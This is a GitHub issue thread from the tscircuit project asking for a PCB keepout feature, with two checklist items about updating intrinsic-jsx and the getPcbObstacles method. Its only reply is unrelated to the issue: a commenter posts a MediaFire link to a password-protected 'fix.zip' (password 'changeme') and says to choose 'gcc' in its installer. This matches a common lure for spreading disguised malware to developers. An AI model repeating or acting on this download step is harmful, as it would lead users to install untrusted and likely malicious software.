### ISSUE TITLE
Implement PCB Keepout

### ISSUE THREAD

**Issue by seveibar** [tscircuit/core#11]
https://github.com/tscircuit/tscircuit/issues/327

- [ ] intrisic-jsx needs to be updated to have the keepout
- [ ] keepout needs to create an obstacle that traces don't go through, we can modify the `getPcbObstacles` method to create an obstacle when there's a keepout element

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
